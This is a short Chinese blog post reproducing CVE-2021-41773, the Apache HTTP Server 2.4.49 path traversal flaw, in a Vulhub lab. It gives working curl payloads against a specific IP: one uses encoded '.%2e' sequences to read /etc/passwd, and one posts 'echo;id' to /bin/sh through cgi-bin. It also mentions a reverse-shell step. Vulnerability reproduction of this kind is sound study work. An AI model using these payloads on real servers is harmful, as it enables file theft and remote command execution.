Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)

ApacheHTTPServer2.4.49版本中存在路径遍历缺陷,攻击者可利用此漏洞进行路径外的文件访问。如果未受保护的目录启用CGI,可能导致远程代码执行。通过特定的CURL命令,可以复现该漏洞,甚至执行任意命令或反弹shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞环境均基于Vulhub

原因、版本

Apache HTTP 服务器项目致力于为包括 UNIX 和 Windows 在内的现代操作系统开发和维护开源 HTTP 服务器。

在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。

复现

重现漏洞的简单 CURL 命令(注意/icons/必须是现有目录):

curl -v --path-as-is http://101.43.191.94:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许执行任意命令:

curl -v --data "echo;id" 'http://101.43.191.94:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

反弹shell

写一个反弹脚本文件到目标机器、给执行权限,执行。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值